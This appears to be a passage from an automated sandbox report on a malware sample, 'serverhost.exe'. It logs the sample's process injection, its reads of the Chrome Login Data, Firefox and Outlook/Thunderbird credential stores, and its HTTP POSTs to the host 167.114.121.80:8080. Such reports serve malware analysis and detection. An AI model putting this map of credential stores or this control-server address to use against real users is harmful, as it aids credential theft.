| Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" | address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 |
|
1 | |
| Get Info | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" | address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8650752 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" | address = 0x400000, size = 114688 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" | address = 0x7ffdf008, size = 4 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" | address = 0x400000, size = 102400 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" | address = 0x7ffdd008, size = 4 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" | address = 0x400000, size = 372736 |
|
1 | |
| Write | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" | address = 0x7ffd4008, size = 4 |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x76890000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76590000 |
|
2 | |
| Load | ADVAPI32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x76b40000 |
|
1 | |
| Load | ntdll.dll | base_address = 0x772a0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x764f0000 |
|
5 | |
| Load | ole32.dll | base_address = 0x77140000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
4 | |
| Load | crypt32.dll | base_address = 0x755b0000 |
|
4 | |
| Load | urlmon.dll | base_address = 0x76f00000 |
|
4 | |
| Load | userenv.dll | base_address = 0x74af0000 |
|
5 | |
| Load | wininet.dll | base_address = 0x77040000 |
|
4 | |
| Load | wtsapi32.dll | base_address = 0x74180000 |
|
5 | |
| Load | mpr.dll | base_address = 0x71dd0000 |
|
1 | |
| Load | netapi32.dll | base_address = 0x73e90000 |
|
1 | |
| Load | SAMCLI.DLL | base_address = 0x734e0000 |
|
1 | |
| Get Handle | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe | base_address = 0xc40000 |
|
1 | |
| Get Filename | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exemh.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
7 | ||
| Get Address | c:\windows\system32\user32.dll | function = ReleaseCapture, address_out = 0x768c69f2 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetProcessWindowStation, address_out = 0x7689dfdc |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetCaretBlinkTime, address_out = 0x768a0d01 |
|
1 | |
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2cf31c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2cf33c |
|
1 | ||
| Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2cf41c |
|
1 | ||
| Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2cf41c |
|
1 | ||
| Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2cf41c |
|
1 | ||
| Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x2cf41c |
|
1 | ||
| Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2cf41c |
|
1 | ||
| Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2cf41c |
|
1 | ||
| Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2cf41c |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleFileNameA, address_out = 0x765e33f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameA, address_out = 0x765c6ba9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x765dca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x765c8c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7663bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameExA, address_out = 0x7661f41f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x765dcf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x765dcee8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameA, address_out = 0x7651a4b4 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrStrIA, address_out = 0x76b4d250 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = strchr, address_out = 0x772e7690 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b |
|
1 | |
| Create Mapping | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
3 | |
| Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| Get Time | type = Ticks, time = 110292 |
|
1 | |
| Get Time | type = Ticks, time = 111306 |
|
1 | |
| Get Time | type = Ticks, time = 112305 |
|
1 | |
| Get Time | type = Ticks, time = 113303 |
|
1 | |
| Get Time | type = Ticks, time = 114301 |
|
1 | |
| Get Time | type = Ticks, time = 115300 |
|
1 | |
| Get Time | type = Ticks, time = 116080 |
|
3 | |
| Get Time | type = Ticks, time = 116158 |
|
1 | |
| Get Time | type = Ticks, time = 116298 |
|
1 | |
| Get Time | type = Ticks, time = 116813 |
|
1 | |
| Get Time | type = Ticks, time = 117094 |
|
3 | |
| Get Time | type = Ticks, time = 117172 |
|
1 | |
| Get Time | type = Ticks, time = 117297 |
|
1 | |
| Get Time | type = Ticks, time = 118092 |
|
1 | |
| Get Time | type = Ticks, time = 118139 |
|
1 | |
| Get Time | type = Ticks, time = 118201 |
|
1 | |
| Get Time | type = Ticks, time = 118233 |
|
1 | |
| Get Time | type = Ticks, time = 118373 |
|
1 | |
| Get Time | type = Ticks, time = 119106 |
|
3 | |
| Get Time | type = Ticks, time = 119169 |
|
1 | |
| Get Time | type = Ticks, time = 119293 |
|
1 | |
| Get Time | type = Ticks, time = 120027 |
|
1 | |
| Get Time | type = Ticks, time = 120136 |
|
3 | |
| Get Time | type = Ticks, time = 120167 |
|
1 | |
| Get Time | type = Ticks, time = 120323 |
|
1 | |
| Get Time | type = Ticks, time = 121087 |
|
3 | |
| Get Time | type = Ticks, time = 121165 |
|
1 | |
| Get Time | type = Ticks, time = 121290 |
|
1 | |
| Get Time | type = Ticks, time = 121306 |
|
1 | |
| Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = MA991ED3B |
|
1 | |
| Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Release | mutex_name = Global\I78B95E2E |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 0.64 KB (660 bytes) |
| Total Data Received | 433.95 KB (444360 bytes) |
| Contacted Host Count | 1 |
| Contacted Hosts | 167.114.121.80 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | 167.114.121.80 |
| Server Port | 8080 |
| Username | 0 |
| Password | 0 |
| Data Sent | 0.32 KB (330 bytes) |
| Data Received | 433.79 KB (444204 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 |
|
1 | |
| Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = 0 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Read Response | size = 444196, size_out = 444196 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session |
|
2 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) |
| Server Name | 167.114.121.80 |
| Server Port | 8080 |
| Username | 0 |
| Password | 0 |
| Data Sent | 0.32 KB (330 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 |
|
1 | |
| Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = 0 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session |
|
2 |
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C570.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:00 |
| Information | Value |
|---|---|
| PID | 0xc50 |
| Parent PID | 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C54
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc20 | address = 0x400000, size = 114688 |
|
1 | |
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc20 | address = 0x7ffdf008, size = 4 |
|
1 | |
| Modify Control Flow | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc20 | os_tid = 0xc54, address = 0x0 |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost_lng.ini | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Profiles | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Thunderbird\Profiles | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\Mozilla Thunderbird | type = file_attributes |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x6eb50000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | pstorec.dll | base_address = 0x71ec0000 |
|
1 | |
| Get Handle | private_0x0000000000400000 | base_address = 0x400000 |
|
2 | |
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
2 | ||
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = InitCommonControlsEx, address_out = 0x6eb56be6 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = SHGetSpecialFolderPathA, address_out = 0x75aefb26 |
|
1 | |
| Get Address | c:\windows\system32\pstorec.dll | function = PStoreCreateInstance, address_out = 0x71ec526c |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = AddExportHeaderLine, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = WinPos |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = Columns |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.cfg | section_name = General, key_name = Sort, default_value = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" "C:\ProgramData\C572.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:00 |
| Information | Value |
|---|---|
| PID | 0xc58 |
| Parent PID | 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C5C
0x
C8C
0x
C90
0x
C94
0x
C98
0x
C9C
0x
CA8
0x
CAC
0x
CB0
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc30 | address = 0x400000, size = 102400 |
|
1 | |
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc30 | address = 0x7ffdd008, size = 4 |
|
1 | |
| Modify Control Flow | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc30 | os_tid = 0xc5c, address = 0x0 |
|
1 |
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | ED475410-B0D6-11D2-8C3B-00104B2A6676 | 9240A6CD-AF41-11D2-8C3B-00104B2A6676 | cls_context = CLSCTX_INPROC_SERVER |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\ProgramData\C572.tmp | desired_access = GENERIC_WRITE |
|
1 | |
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Open | STD_OUTPUT_HANDLE |
|
1 | ||
| Open | STD_ERROR_HANDLE |
|
1 | ||
| Write | C:\ProgramData\C572.tmp | size = 58 |
|
1 | |
| Write | C:\ProgramData\C572.tmp | size = 54 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | value_name = DLLPathEx, data = 67 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook | value_name = MSIApplicationLCID, data = 77 |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | advapi32.dll | base_address = 0x764f0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x77140000 |
|
1 | |
| Load | shell32.dll | base_address = 0x758a0000 |
|
1 | |
| Load | C:\PROGRA~1\MICROS~1\Office15\OLMAPI32.DLL | base_address = 0x63430000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
1 | |
| Get Handle | mscoree.dll |
|
1 | ||
| Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x765e418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x765e1f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x765e1e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x765e76e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x765e3879 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x765924d8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x765c2111 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x765d2510 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x765cb009 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x772c89be |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x772bc02a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x772bc0d2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x765c3f78 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x772c8bfb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x772bb567 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x772e5998 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x772b2251 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x772b28f6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x765c2004 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x76619aa9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7661f3cf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x765eebc6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7662f29f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x765c53a5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7662f21a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7661f70b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7661f71b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7661f72b |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x765ceb4e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-12 10:39:22 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 119293 |
|
2 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
1 |
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe" /scomma "C:\ProgramData\C571.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:25, Reason: Child Process |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:00 |
| Information | Value |
|---|---|
| PID | 0xc64 |
| Parent PID | 0xc18 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C68
0x
C80
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc24 | address = 0x400000, size = 372736 |
|
1 | |
| Modify Memory | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc24 | address = 0x7ffd4008, size = 4 |
|
1 | |
| Modify Control Flow | #11: c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe | 0xc24 | os_tid = 0xc68, address = 0x0 |
|
1 |
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017101220171013\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017063020170701\index.dat | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\Profiles\zp0p8bce.default\places.sqlite | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Web Data | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data | desired_access = GENERIC_READ |
|
1 | |
| Create | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Google\Chrome\User Data\Default\Login Data | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\ProgramData\C571.tmp | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
